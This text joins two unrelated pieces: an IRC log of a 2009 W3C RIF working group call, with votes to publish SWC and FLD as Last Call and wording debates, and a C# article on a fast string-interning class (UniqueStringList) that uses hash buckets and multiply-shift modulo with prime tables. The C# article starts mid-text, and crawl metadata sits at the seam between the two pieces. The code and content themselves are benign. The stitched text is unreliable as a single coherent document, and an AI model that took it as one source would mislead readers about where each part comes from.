Sandro: haven't asked for publication date yet - probably June 2 or 4, but could probably push off to June 9
16:13:31 [mdean]
ChrisW: proofs are non-normative
16:14:04 [mdean]
Jos: might require small changes
16:14:06 [sandro]
bug-fixed after Last Call are okay.
16:15:17 [mdean]
Sandro: worth waiting for proofs?
16:15:55 [mdean]
... but extra week would also help for rdf:text
16:16:32 [mdean]
Chris: get well soon
16:16:48 [ChrisW]
action: josb to finish the SWC proofs or remove them
16:16:48 [trackbot]
Created ACTION-831 - Finish the SWC proofs or remove them [on Jos de Bruijn - due 2009-06-02].
16:16:49 [mdean]
s/Chris/ChrisW/
16:17:20 [ChrisW]
PROPOSED: publish SWC as Last Call, pending completion of actions 829, 831, and 830
16:17:37 [AdrianP]
+1
16:17:39 [ChrisW]
+1
16:17:41 [josb]
+1
16:17:42 [Harold]
+1
16:17:43 [cke]
+1
16:17:43 [sandro]
+1
16:17:43 [StellaMitchell]
+1
16:17:43 [hak]
+1
16:17:44 [Gary]
+1
16:17:44 [MichaelKifer]
+1
16:17:45 [mdean]
+1
16:17:47 [apollere2]
+1
16:17:50 [ChrisW]
Leora: +1 (on phone)
16:18:06 [ChrisW]
RESOLVED: publish SWC as Last Call, pending completion of actions 829, 831, and 830
16:18:17 [ChrisW]
zakim, next item
16:18:17 [Zakim]
agendum 7. "XML Schema task force" taken up [from ChrisW]
16:18:30 [ChrisW]
zakim, list agenda
16:18:30 [Zakim]
I see 4 items remaining on the agenda:
16:18:32 [Zakim]
7. XML Schema task force [from ChrisW]
16:18:33 [Zakim]
8. WG Future and schedule [from ChrisW]
16:18:34 [Zakim]
9. rdf:text [from ChrisW]
16:18:34 [Zakim]
10. AOB [from ChrisW]
16:18:40 [ChrisW]
zakim, take up item 6
16:18:40 [Zakim]
agendum 6. "FLD" taken up [from ChrisW]
16:19:04 [mdean]
ChrisW: reviewed by Stella and Chris
16:19:17 [mdean]
StellaMitchell: all comments have been addressed
16:20:23 [ChrisW]
"All logic RIF dialects are required to be derived from RIF-FLD by specialization, as explained..."
16:20:43 [ChrisW]
"MUST"
16:22:07 [csma]
+1 that non-conformance is not weel defined, if it is a MUST
16:22:09 [ChrisW]
"All RIF dialects SHOULD be derived from RIF-FLD by specialization, as explained..."
16:22:19 [mdean]
s/weel/well/
16:23:14 [csma]
q+
16:23:34 [mdean]
ChrisW: SHOULD implies that you should say why if you can't do something
16:24:09 [Harold]
End of first paragraph: "Therefore, any logic dialect being developed to become a standard should either be a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:25:35 [csma]
q?
16:25:39 [Harold]
Could be changed to: "Therefore, any dialect being developed to become a standard should either be a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:26:17 [mdean]
MichaelKifer: prefer MUST and keeping logic
16:26:41 [mdean]
... but not a showstopper
16:26:42 [csma]
ack csma
16:26:55 [ChrisW]
ack csma.a
16:27:02 [ChrisW]
zakim, csma.a is csma
16:27:02 [Zakim]
+csma; got it
16:27:02 [Harold]
At later points "logic" could be kept.
16:27:47 [mdean]
csma: +1 for SHOULD, afraid of consequences of removing logic on PRD
16:28:06 [sandro]
ChrisW, let's just use SHOULD and leave in "logic".... okay?
16:28:15 [mdean]
ChrisW: still went through process, but not documented - grandfathered in
16:28:39 [sandro]
PROPOSED.... ?
16:28:51 [sandro]
ChrisW, we don't have a lot of time!!
16:29:25 [Harold]
What about: "Therefore, the development of any dialect to become a standard should start as a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:29:32 [mdean]
csma: removing logic throughout would be very painful
16:29:46 [ChrisW]
action: to update wording in intro & abstract to use "SHOULD"
16:29:46 [trackbot]
Sorry, couldn't find user - to
16:30:24 [ChrisW]
PROPOSED: go for another 10 mins?
16:30:24 [hak]
-1
16:30:25 [sandro]
+1 extend 10+ minuntes
16:30:27 [csma]
+1
16:30:30 [Harold]
+1
16:30:34 [mdean]
+1
16:30:41 [AdrianP]
+1
16:30:56 [mdean]
ChrisW: disjointness of variables and constants
16:31:01 [Zakim]
-hak
16:31:53 [mdean]
MichaelKifer: special syntax for constants would make this a mess and require disambiguation rules, e.g. open formulas
16:31:54 [csma]
action: mkifer to update wording in intro & abstract to use "SHOULD"
16:31:54 [trackbot]
Created ACTION-832 - Update wording in intro & abstract to use "SHOULD" [on Michael Kifer - due 2009-06-02].
16:32:26 [mdean]
ChrisW: don't require all dialects, but allow free variables in framework
16:32:38 [mdean]
s/all/in all/
16:32:59 [mdean]
MichaelKifer: require would substantial revisions
16:33:27 [mdean]
... need to think of what changes would require, but don't see much value
16:33:47 [mdean]
ChrisW: don't have particular use case, but note that it is allowed in Common Logic
16:34:20 [mdean]
MichaelKifer: if it's quantified, you know it's a variable
16:35:10 [mdean]
s/require would/would require/
16:35:25 [sandro]
MichaelKifer: because it's an exchange language, you always apply some sort of transformation anyway.
16:35:28 [mdean]
Harold: some editorial edits
16:35:43 [mdean]
... introduced extension points - now also in schema
16:36:03 [mdean]
MichaelKifer: haven't looked at Stella's message today
16:36:15 [ChrisW]
PROPOSED: Publish FLD as Last Call pending completion of action 832
16:36:17 [mdean]
StellaMitchell: clarification regarding XML serialization
16:36:33 [ChrisW]
+1
16:36:34 [sandro]
+1
16:36:38 [MichaelKifer]
+1
16:36:39 [StellaMitchell]
+1
16:36:40 [Harold]
+1
16:36:41 [mdean]
+1
16:36:44 [josb]
+1
16:36:44 [ChrisW]
Leora: +1 (on phone)
16:36:49 [AdrianP]
+1
16:36:54 [apollere2]
+1
16:37:01 [Gary]
+1
16:37:19 [cke]
+1
16:37:30 [ChrisW]
RESOLVED: Publish FLD as Last Call pending completion of action 832
16:37:55 [csma]
clap! clap! clap!
16:38:06 [mdean]
ChrisW: good work!
16:38:19 [mdean]
... long road
16:38:35 [ChrisW]
zakim, take up item 7
16:38:35 [Zakim]
agendum 7. "XML Schema task force" taken up [from ChrisW]
16:39:03 [Zakim]
-josb
16:39:16 [mdean]
ChrisW: glossed over several issues in normative exchange syntax
16:39:56 [mdean]
ChrisW: task force will meet regularly during Last Call, finish modularization, etc.
16:39:59 [cke]
How long will be task force be?
16:40:07 [csma]
I will send an email tomorrow
16:40:10 [mdean]
... csma will be leading the task force
16:40:16 [ChrisW]
zakim, take up item 8
16:40:16 [Zakim]
agendum 8. "WG Future and schedule" taken up [from ChrisW]
16:40:31 [AdrianP]
have not received any invite for the task force?
16:40:41 [mdean]
ChrisW: expecting a telecon next week and the week after that
16:41:02 [csma]
action: csma to send email about the XML schemas TF
16:41:02 [trackbot]
Created ACTION-833 - Send email about the XML schemas TF [on Christian de Sainte Marie - due 2009-06-02].
16:41:08 [mdean]
... then reduce to at least once a month to respond to LC comments as needed
16:41:15 [csma]
zakim, numute me
16:41:15 [Zakim]
I don't understand 'numute me', csma
16:41:22 [mdean]
... still reserve time slot but don't need every week
16:41:22 [csma]
zakim, unmute me
16:41:22 [Zakim]
csma was not muted, csma
16:41:41 [ChrisW]
zakim, take up item 9
16:41:41 [Zakim]
agendum 9. "rdf:text" taken up [from ChrisW]
16:41:43 [csma]
zakim, mute me
16:41:43 [Zakim]
csma should now be muted
16:42:16 [mdean]
Sandro: any problems with replacing rdf:text with rdf:plainLiteral?
16:43:00 [sandro]
rdf:PlainLiteral (capital P)
16:43:03 [csma]
ack csma
16:43:03 [mdean]
ChrisW: adjourned
16:43:07 [Zakim]
-Gary
16:43:11 [Zakim]
-LeoraMorgenstern
16:43:20 [Zakim]
-StellaMitchell
16:43:21 [ChrisW]
zakim, list attendees
16:43:21 [Zakim]
-Harold
16:43:23 [Zakim]
As of this point the attendees have been Sandro, ChrisW, mdean, cke, hak, Harold, DaveReynolds, AdrianP, josb, Gary, csma, MichaelKifer, StellaMitchell, AxelPolleres,
16:43:25 [Zakim]
... LeoraMorgenstern
16:43:30 [ChrisW]
rrsagent, make minutes
16:43:30 [RRSAgent]
I have made the request to generate
ChrisW
16:43:41 [Zakim]
-AdrianP
16:43:48 [csma]
zakim, who is the phone?
16:43:48 [Zakim]
I don't understand your question, csma.
16:43:54 [Zakim]
-cke
16:43:55 [Zakim]
-MichaelKifer
16:43:55 [Zakim]
-mdean
16:43:58 [ChrisW]
zakim, who is on the phone?
16:43:58 [Zakim]
On the phone I see Sandro, ChrisW, csma, AxelPolleres
16:44:14 [Zakim]
-AxelPolleres
16:44:55 [Zakim]
-ChrisW
16:44:56 [Zakim]
-Sandro
16:44:56 [Zakim]
-csma
16:44:58 [Zakim]
SW_RIF()11:00AM has ended
16:44:59 [Zakim]
Attendees were Sandro, ChrisW, mdean, cke, hak, Harold, DaveReynolds, AdrianP, josb, Gary, csma, MichaelKifer, StellaMitchell, AxelPolleres, LeoraMorgenstern
16:45:54 [MichaelKifer]
MichaelKifer has left #rif
16:53:22 [AdrianP]
Is it possible to have it one hour later 6 pm CEST?
16:57:21 [MoZ]
MoZ has joined #rif
17:02:23 [csma]
csma has left #rif
17:33:36 [sandro]
Zakim, room for 2?
17:33:37 [Zakim]
ok, sandro; conference Team_(rif)17:33Z scheduled with code 7431 (RIF1) for 60 minutes until 1833Z
18:34:45 [sandro]
sandro has joined #rif | http://www.w3.org/2009/05/26-rif-irc | CC-MAIN-2013-48 | refinedweb | 4,545 | 60.89 |
This article is about a class called UniqueStringList, various versions of which I have been using for many years. I thought it was fully optimized but I recently used a couple of new techniques to make it twice as quick and thought I would share them with you.
Reusing the same copy of a distinct string value is called String Interning. String Interning is a good thing for two main reasons:

- It saves memory: only one instance of each distinct value needs to be kept alive, however many times it appears.
- It can speed up comparisons: two interned strings with the same content are reference-equal, so equality checks can short-circuit without comparing characters.
The C# compiler automatically Interns all literal strings within your source files when building an assembly. You may have seen the String.Intern() method. Don't use it in your code! Any string you add to this Intern Pool cannot be removed and will stay there until your app closes!
Although not String Interning per se, in my Optimizing Serialization in .NET article, one of the biggest optimizations was to produce a token for each unique string being serialized. It did not affect the strings on the serializing end but ensured that at the deserializing end, only one copy of the string would exist - automatically interned if you will.
Prevention of duplicate strings is very beneficial if you can remove the duplicates at source. Imagine a CSV file being read with 100,000 lines and assume that some string appears on every line (e.g., "No fault found"). Since each line is read separately and has no knowledge of the lines above and below it, you will be storing 100,000 copies of that same string in memory. If you can Intern all the strings read from a single line, you will end up with just one copy of each unique string, which can save megabytes of memory.
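The idea is easy to sketch even before we get to the optimized class: a minimal interner is just a dictionary mapping each distinct string to its first-seen instance. The snippet below simulates the CSV scenario with a hypothetical status field; the UniqueStringList class presented later does the same job faster and with a stable index.

```csharp
using System;
using System.Collections.Generic;

static class Program
{
    // Minimal interner: returns the first-seen instance for equal content.
    static readonly Dictionary<string, string> Pool = new Dictionary<string, string>();

    static string Intern(string s)
    {
        string existing;
        if (Pool.TryGetValue(s, out existing)) return existing;
        Pool.Add(s, s);
        return s;
    }

    static void Main()
    {
        // Simulate 100,000 CSV lines, each producing a fresh copy of the same text
        // (new string(char[]) forces a distinct instance, as a file reader would).
        string first = null;
        for (int line = 0; line < 100000; ++line)
        {
            string status = Intern(new string("No fault found".ToCharArray()));
            if (first == null) first = status;
        }

        // Only one instance survives: every interned copy is reference-equal.
        Console.WriteLine(ReferenceEquals(first, Intern("No fault found"))); // True
        Console.WriteLine(Pool.Count);                                       // 1
    }
}
```

Unlike String.Intern(), a pool like this can simply be dropped when you are finished with it, so the memory is reclaimable.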
It is a similar case when reading XML files or retrieving data from a middle-tier layer and creating POCOs (Plain Old CLR Objects) for each item: the chances are you will be getting duplicates of the strings involved unless you remove them yourself.
Imagine displaying a large amount of data in a grid. You click on the filter icon in the header and, after a short pause, it displays a list of unique items to filter against. Wouldn't it be nice if the process of generating this list was so quick it appeared instantly?
An even simpler scenario is just asking whether the string has been seen before and maybe skipping some processing if it has.
Of course, the process of interning strings is not free: it takes some time, so the less time it takes, the better, and that is what this article is about. Also, don't forget that you will be saving time by making fewer memory allocations, so ultimately you could get the best of both worlds: large memory savings with little or no additional overhead.
So we have some scenarios here for string interning/duplicate detection, but with slightly different requirements:

- Interning: given a string, get back the single shared instance with the same content.
- Membership: a simple bool answer to whether the string has been seen before.
- Indexing: a stable index for each unique string that never changes as more strings are added.
The code I eventually came up with uses ideas from three sources:

- The internal workings of HashSet<T>, in particular its Slot struct and bucket scheme.
- The internal HashHelpers class in System.Collections (System.Collections.Generic in earlier frameworks), which supplies a ready-made list of primes for bucket sizing.
- The article "Optimizing integer divisions with Multiply Shift in C#", which provides the fast-division technique used here.
To promote reusability, I have created a MathHelper class and a QuickDivideInfo struct, and the code for these is listed below. These incorporate the ideas of pre-calculating Golden Primes and pre-calculating the Fast Division information for them.
From the QuickDivideInfo struct, only the ModuloPositive() method is actually used by UniqueStringList, but I have included the other methods for completeness and checked them against every possible int numerator. Apart from int.MinValue, all other values return exactly the same result as the '%' operator, but three times faster.
My time testing has shown that all these methods are inlinable.
I have also added unchecked statements around the arithmetic since there is no chance of overflow. Therefore compiling with the "Check for arithmetic overflow/underflow" option set will not affect the speed increase.
public struct QuickDivideInfo
{
public readonly int Divisor;
public readonly long Multiplier;
public readonly int Shift;
public QuickDivideInfo(int divisor, long multiplier, int shift)
{
Divisor = divisor;
Multiplier = multiplier;
Shift = shift;
}
public int Divide(int numerator)
{
return numerator < 0 ? DivideNegative(numerator) : DividePositive(numerator);
}
public int DividePositive(int numerator)
{
unchecked
{
return (int) ((numerator * Multiplier) >> Shift);
}
}
// Does not work with int.MinValue as the numerator!
public int DivideNegative(int numerator)
{
unchecked
{
return (int) -((-numerator * Multiplier) >> Shift);
}
}
public int Modulo(int numerator)
{
return numerator < 0 ? ModuloNegative(numerator) : ModuloPositive(numerator);
}
public int ModuloPositive(int numerator)
{
return numerator - DividePositive(numerator) * Divisor;
}
// Does not work with int.MinValue as the numerator!
public int ModuloNegative(int numerator)
{
return numerator - DivideNegative(numerator) * Divisor;
}
}
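It is worth sanity-checking the multiply-shift trick directly. Using the constants for divisor 53 from the GoldenPrimes table above (multiplier 1296593901, shift 36), the quotient and remainder computed without any division instruction match the '/' and '%' operators for every positive numerator tried:

```csharp
using System;

static class MultiplyShiftCheck
{
    const int Divisor = 53;
    const long Multiplier = 1296593901;
    const int Shift = 36;

    static void Main()
    {
        for (int n = 0; n <= 10000000; ++n)
        {
            // Quotient via multiply-shift: no division instruction is executed.
            int quotient = (int) ((n * Multiplier) >> Shift);
            int remainder = n - quotient * Divisor;

            if (quotient != n / Divisor || remainder != n % Divisor)
            {
                Console.WriteLine("Mismatch at " + n);
                return;
            }
        }
        Console.WriteLine("All positive numerators up to 10,000,000 match");
    }
}
```

The multiplication promotes n to long automatically, so there is no overflow for any non-negative int numerator.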
For completeness, I have also added the normal pre-calculated Primes as used by Microsoft and pre-calculated their Fast Division information too.
public static class MathHelper
{
public const int Lower31BitMask = 0x7fffffff;
// Allows quadrupling of the bucket table size for smaller sizes,
// then reverting to doubling.
static readonly int[] GoldenPrimeAccelerators =
new[]
{
389, 1543, 6151, 24593, 98317
};
// Based on Golden Primes (as far as possible from nearest two powers of two)
// at
// and Optimizing integer divisions with Multiply Shift in C#
// at /KB/string/FindMulShift.aspx
static readonly QuickDivideInfo[] GoldenPrimes =
new[]
{
new QuickDivideInfo(53, 1296593901, 36), // acceleration skip
new QuickDivideInfo(97, 354224107, 35), // acceleration skip
new QuickDivideInfo(193, 356059465, 36), // acceleration skip
new QuickDivideInfo(389, 2826508041, 40),
new QuickDivideInfo(769, 2859588109, 41), // acceleration skip
new QuickDivideInfo(1543, 356290223, 39),
new QuickDivideInfo(3079, 714200473, 41), // acceleration skip
new QuickDivideInfo(6151, 178753313, 40),
new QuickDivideInfo(12289, 1431539267, 44), // acceleration skip
new QuickDivideInfo(24593, 2861332257, 46),
new QuickDivideInfo(49157, 1431510145, 46), // acceleration skip
new QuickDivideInfo(98317, 2862932929, 48),
new QuickDivideInfo(196613, 715809679, 47),
new QuickDivideInfo(393241, 1431564749, 49),
new QuickDivideInfo(786433, 1431653945, 50),
new QuickDivideInfo(1572869, 2863302429, 52),
new QuickDivideInfo(3145739, 2863301519, 53),
new QuickDivideInfo(6291469, 2863305615, 54),
new QuickDivideInfo(12582917, 1431655197, 54),
new QuickDivideInfo(25165843, 1431654685, 55),
new QuickDivideInfo(50331653, 2863311247, 57),
new QuickDivideInfo(100663319, 2863310877, 58),
new QuickDivideInfo(201326611, 2863311261, 59),
new QuickDivideInfo(402653189, 357913937, 57),
new QuickDivideInfo(805306457, 2863311215, 61),
new QuickDivideInfo(1610612741, 1431655761, 61),
};
// Based on the list of primes in System.Collections.Generic.HashHelpers
static readonly QuickDivideInfo[] Primes =
new[]
{
new QuickDivideInfo(3, 2863311531, 33),
new QuickDivideInfo(7, 2454267027, 34),
new QuickDivideInfo(11, 780903145, 33),
new QuickDivideInfo(17, 2021161081, 35),
new QuickDivideInfo(23, 2987803337, 36),
new QuickDivideInfo(29, 2369637129, 36),
new QuickDivideInfo(37, 3714566311, 37),
new QuickDivideInfo(47, 2924233053, 37),
new QuickDivideInfo(59, 582368447, 35),
new QuickDivideInfo(71, 3871519817, 38),
new QuickDivideInfo(89, 3088515809, 38),
new QuickDivideInfo(107, 1284476201, 37),
new QuickDivideInfo(131, 1049152317, 37),
new QuickDivideInfo(163, 210795941, 35),
new QuickDivideInfo(197, 1395319325, 38),
new QuickDivideInfo(239, 2300233531, 39),
new QuickDivideInfo(293, 3752599413, 40),
new QuickDivideInfo(353, 3114763819, 40),
new QuickDivideInfo(431, 2551071063, 40),
new QuickDivideInfo(521, 1055193501, 39),
new QuickDivideInfo(631, 871245347, 39),
new QuickDivideInfo(761, 1444824741, 40),
new QuickDivideInfo(919, 2392843587, 41),
new QuickDivideInfo(1103, 498418689, 39),
new QuickDivideInfo(1327, 3314277703, 42),
new QuickDivideInfo(1597, 2753942713, 42),
new QuickDivideInfo(1931, 284700059, 39),
new QuickDivideInfo(2333, 1885146383, 42),
new QuickDivideInfo(2801, 785085061, 41),
new QuickDivideInfo(3371, 2609342339, 43),
new QuickDivideInfo(4049, 2172411219, 43),
new QuickDivideInfo(4861, 904761677, 42),
new QuickDivideInfo(5839, 188304783, 40),
new QuickDivideInfo(7013, 2508510773, 44),
new QuickDivideInfo(8419, 2089581429, 44),
new QuickDivideInfo(10103, 870641693, 43),
new QuickDivideInfo(12143, 1448751219, 44),
new QuickDivideInfo(14591, 602843741, 43),
new QuickDivideInfo(17519, 2008355049, 45),
new QuickDivideInfo(21023, 1673613285, 45),
new QuickDivideInfo(25229, 1394600345, 45),
new QuickDivideInfo(30293, 2322937451, 46),
new QuickDivideInfo(36353, 3871413319, 47),
new QuickDivideInfo(43627, 3225926339, 47),
new QuickDivideInfo(52361, 167989401, 43),
new QuickDivideInfo(62851, 1119612165, 46),
new QuickDivideInfo(75431, 932888921, 46),
new QuickDivideInfo(90523, 97169703, 43),
new QuickDivideInfo(108631, 2591110979, 48),
new QuickDivideInfo(130363, 2159163081, 48),
new QuickDivideInfo(156437, 1799286465, 48),
new QuickDivideInfo(187751, 2998385913, 49),
new QuickDivideInfo(225307, 1249295303, 48),
new QuickDivideInfo(270371, 2082138815, 49),
new QuickDivideInfo(324449, 1735095357, 49),
new QuickDivideInfo(389357, 722922605, 48),
new QuickDivideInfo(467237, 2409697663, 50),
new QuickDivideInfo(560689, 2008064911, 50),
new QuickDivideInfo(672827, 1673386929, 50),
new QuickDivideInfo(807403, 87154425, 46),
new QuickDivideInfo(968897, 2324085857, 51),
new QuickDivideInfo(1162687, 1936720557, 51),
new QuickDivideInfo(1395263, 403472287, 49),
new QuickDivideInfo(1674319, 336226223, 49),
new QuickDivideInfo(2009191, 1120749503, 51),
new QuickDivideInfo(2411033, 933956447, 51),
new QuickDivideInfo(2893249, 1556589021, 52),
new QuickDivideInfo(3471899, 1297157443, 52),
new QuickDivideInfo(4166287, 135120301, 49),
new QuickDivideInfo(4999559, 56299961, 48),
new QuickDivideInfo(5999471, 3002664487, 54),
new QuickDivideInfo(7199369, 2502219085, 54),
};
public static bool IsPrime(int candidate)
{
if ((candidate & 1) == 0)
{
return candidate == 2;
}
int max = (int) Math.Sqrt(candidate);
for (int i = 3; i <= max; i += 2)
{
if (candidate % i == 0)
{
return false;
}
}
return true;
}
public static int GetPrime(int min)
{
return GetPrimeCore(Primes, min);
}
public static int GetGoldenPrime(int min)
{
return GetPrimeCore(GoldenPrimes, min);
}
public static QuickDivideInfo GetPrimeInfo(int min)
{
return GetPrimeInfoCore(Primes, min);
}
public static QuickDivideInfo GetGoldenPrimeInfo(int min, bool accelerate = true)
{
if (accelerate)
{
foreach (var goldenPrimeAccelerator in GoldenPrimeAccelerators)
{
if (min > goldenPrimeAccelerator) continue;
min = goldenPrimeAccelerator;
break;
}
}
return GetPrimeInfoCore(GoldenPrimes, min);
}
static QuickDivideInfo GetPrimeInfoCore(QuickDivideInfo[] set, int min)
{
for (int i = 0; i < set.Length; ++i)
{
if (set[i].Divisor >= min)
{
return set[i];
}
}
throw new ArgumentOutOfRangeException("min",
"You really need a prime larger than 1,610,612,741?!");
}
static int GetPrimeCore(QuickDivideInfo[] set, int min)
{
for (int i = 0; i < set.Length; ++i)
{
int num = set[i].Divisor;
if (num >= min) return num;
}
for (int i = min | 1; i < 2147483647; i += 2)
{
if (IsPrime(i))
{
return i;
}
}
return min;
}
public static bool IsPowerOfTwo(int value)
{
return value > 0 && (value & (value - 1)) == 0;
}
public static bool IsPowerOfTwo(long value)
{
return value > 0 && (value & (value - 1)) == 0;
}
}
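The GoldenPrimeAccelerators table is what lets small bucket tables grow in bigger jumps (roughly quadrupling) before reverting to doubling. A quick illustration of the effect — note this is not standalone, it calls the MathHelper class above:

```csharp
// Small requests jump straight to the next accelerator prime:
var small = MathHelper.GetGoldenPrimeInfo(100);
Console.WriteLine(small.Divisor);   // 389 - the 193 step is skipped

// Pass accelerate: false to get the nearest golden prime instead:
Console.WriteLine(MathHelper.GetGoldenPrimeInfo(100, false).Divisor); // 193

// Above the accelerator range, growth follows the plain golden-prime sequence:
var large = MathHelper.GetGoldenPrimeInfo(200000);
Console.WriteLine(large.Divisor);   // 393241
```

Fewer, larger expansions for small tables means fewer expensive rehashes while the list is ramping up.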
I have kept this class lean and mean for performance purposes. The public surface is deliberately small: Clear(), Count, Contains(), IndexOf(), an indexer (this[]), the Add() overloads, and the Intern() overloads.
public sealed class UniqueStringList
{
const float LoadFactor = .72f;
Slot[] slots;
int[] buckets;
int slotIndex;
QuickDivideInfo quickDivideInfo;
public UniqueStringList()
{
Expand(0);
}
public UniqueStringList(int capacity)
{
Expand(capacity);
}
public int Count
{
get { return slotIndex; }
}
public void Clear()
{
Array.Clear(slots, 0, slotIndex);
Array.Clear(buckets, 0, buckets.Length);
slotIndex = 0;
}
public string Intern(string item)
{
int index;
return slotIndex == (index = AddIfMissing(item)) ? item : slots[index].Value;
}
public void Intern(ref string item)
{
int index;
if (slotIndex != (index = AddIfMissing(item)))
{
item = slots[index].Value;
}
}
public void AddRange(IEnumerable<string> items)
{
foreach (var item in items)
{
if (item == null) continue;
AddIfMissing(item);
}
}
public bool Add(string item)
{
return slotIndex == AddIfMissing(item);
}
public bool Add(string item, out int index)
{
return slotIndex == (index = AddIfMissing(item));
}
public IEnumerable<string> GetItems()
{
var index = 0;
while(index < slotIndex)
{
yield return slots[index++].Value;
}
}
public string this[int index]
{
get { return slots[index].Value; }
}
public bool Contains(string item)
{
return IndexOf(item) != -1;
}
public int IndexOf(string item)
{
int hashCode = item.GetHashCode() & MathHelper.Lower31BitMask;
int bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
for (int i = buckets[bucketIndex] - 1; i >= 0; i = slots[i].Next)
{
if (slots[i].HashCode == hashCode && string.Equals(slots[i].Value, item))
{
return i;
}
}
return -1;
}
int AddIfMissing(string item)
{
var hashCode = item.GetHashCode() & MathHelper.Lower31BitMask;
var bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
for (int i = buckets[bucketIndex] - 1; i >= 0; i = slots[i].Next)
{
if (slots[i].HashCode == hashCode && string.Equals(slots[i].Value, item))
{
return i;
}
}
if (slotIndex == slots.Length)
{
Expand(slots.Length + 1);
bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
}
slots[slotIndex].HashCode = hashCode;
slots[slotIndex].Value = item;
slots[slotIndex].Next = buckets[bucketIndex] - 1;
buckets[bucketIndex] = ++slotIndex;
return slotIndex - 1;
}
void Expand(int capacity)
{
quickDivideInfo = MathHelper.GetGoldenPrimeInfo(Math.Max(quickDivideInfo.Divisor + 1,
(int) (capacity / LoadFactor)));
capacity = Math.Max(capacity, (int) (quickDivideInfo.Divisor * LoadFactor));
buckets = new int[quickDivideInfo.Divisor];
Array.Resize(ref slots, capacity);
for (int i = 0; i < slotIndex; ++i)
{
int bucketIndex = quickDivideInfo.ModuloPositive(slots[i].HashCode);
slots[i].Next = buckets[bucketIndex] - 1;
buckets[bucketIndex] = i + 1;
}
}
struct Slot
{
public int HashCode;
public string Value;
public int Next;
}
}
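Before walking through the public members, here is a quick sketch of the basic behaviour; the expected values follow from AddIfMissing returning a stable, insertion-order index:

```csharp
var list = new UniqueStringList();

Console.WriteLine(list.Add("alpha"));      // True  - newly added at index 0
Console.WriteLine(list.Add("beta"));       // True  - newly added at index 1
Console.WriteLine(list.Add("alpha"));      // False - already present

Console.WriteLine(list.IndexOf("beta"));   // 1 - the index never changes
Console.WriteLine(list.Contains("gamma")); // False
Console.WriteLine(list.Count);             // 2

foreach (var s in list.GetItems())
    Console.Write(s + " ");                // alpha beta - insertion order
```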
For simple interning use, there are two Intern() overloads. The first returns the interned instance:

myString = myUniqueStringList.Intern(myString);

The second takes the string by ref and replaces it in place, which is handy for interning fields directly:

myUniqueStringList.Intern(ref myPOCOClass.AStringField);
There are also two Add() overloads. Both return true if the string was newly added and false if it was already present; the second also returns the index of the string via an out parameter:

var justAdded = myUniqueStringList.Add("XXX");

int index;
if (myUniqueStringList.Add("XXX", out index))
{
    ...
}
The AddRange() method allows the addition of multiple strings at once (nulls are checked here and will be ignored).
The GetItems() method returns an enumerator that yields the unique strings in the order they were added. The output from this can populate a string[], a List<string>, or whatever container you need.
The highest level overview for the process is: given an input string, we look in a list for a string that is equal to it and return its index within that list. If the string cannot be found, then it is added to the end of the list and that index is returned.
The main problem is the speed at which the list of strings is searched. We could start at the top and then check each string in turn until we find one that is equal. However, imagine a million strings to search - it would take, on average, 500,000 equality checks to find an existing string (and a full million if the string was not found!). This would be far too slow, of course.
An alternative is to sort the strings as they are added. It would then be very quick to locate a string by using a binary search but incredibly slow to build the list in the first place, since strings would have to be constantly shuffled to keep them sorted. Also, the requirements define a non-changing index so this would not work anyway.
What we need is to retain the idea of being able to just append new strings to the list but when searching the list, reducing the number of comparisons to be the fewest possible. Hashing is the solution; this quickly identifies a very small subset of the strings that could match the input string (or, if you prefer, to exclude all those strings that cannot be equal). We then just need to check against those to see if any is a match.
Hashing uses an array of 'hash buckets' and calculating into which 'bucket' an item should be placed or associated. For a given item, the calculation will always choose the same bucket, thus the contents of all other buckets can be ignored because they cannot contain the sought item. This is what gives hashing its fast search speed.
Hashing is achieved by producing a hash code for an item - a simple int value, usually obtained by its GetHashCode() method, although any method can be used. For our purposes, it is effectively a 'random' number between int.MinValue and int.MaxValue that is guaranteed to be the same for strings with the same content. It is not unique however - completely different strings can produce the same hash code but a good hashing algorithm will produce numbers evenly spread over the whole int range to minimize this. So for example, using words from my test dictionary:
GetHashCode()
int.MaxValue
"wren".GetHashCode() -> 1400949012
"inwood".GetHashCode() -> 1400949012
This produces 'collisions' which are expected and dealt with in any hashing system.
But it is not the only source of collisions:
"bougainvillia".GetHashCode() -> 1516975564
"aniseroot".GetHashCode() -> -630508084
Because we need to choose a bucket in an array, we need a positive number, so we have to make the hash code positive. The quickest way is to simply mask off the top bit - the negative flag - and so our latter case ends up with the same positive number, 1516975564, as the former - another source of collisions.
Furthermore, since the buckets are in the form of an array, we need to calculate an index between 0 and buckets.Length - 1, done using a modulo operation, which will result in even more collisions. If we have more buckets, fewer collisions would be created by this final step. This reduces the number of equality checks but would require more memory. If we have fewer buckets, we save some memory but would have to do more equality checks - the old speed vs. memory trade-off. So often in hashing, use a Load Factor is for the buckets which defines a reasonable compromise. When this load factor is reached (we are using 72%, for example), we increase the number of buckets and recalculate the buckets for the existing items to spread them out.
buckets.Length
Collisions are dealt with by looking at each item associated with the bucket and performing equality checks to find the exact match - in our case, a string equality check. The number of checks we need to do will be tiny compared to the total strings in the list. Our system will use a linked list of Slots, the head of which is pointed to by the bucket. Although this collision resolution sounds problematic and potentially slow, in reality the figures are excellent. In my tests, after I added 213,557 unique strings, the longest chain is 7 and the average chain length is 1.2717 - much better than the 106,778 average if we tried to search sequentially!
So we will use two arrays. The first array will store Slot structs (which contain the string itself, the positive hash code to save recalculation when expanding, and an index to the next Slot in the linked list). The second array is for the hash buckets - a simple int[] which holds an index to the head item in the Slot array.
int[]
Our refined high-level overview changes to: given the input string, we obtain a hash code for it. From the hash code, we get a bucket index. From the bucket index, we get a Slot index. If we are lucky then the Slot will hold the string we are looking for; if not, the Slot.Next property will direct us to another Slot to try - a linked list within the array. If we reach the end of the linked list and have still not found our string, then it must be new and we add it into the system.
Slot.Next
Most of the work is done in the AddIfMissing() method.
AddIfMissing()
The first step is to get a hash code for the item and make it a positive number by ANDing it with 01111111111111111111111111111111 to mask off the negative flag. Then we calculate a bucket index from the positive hash code using our souped-up modulo operation (i.e., the remainder after dividing by the number of buckets).
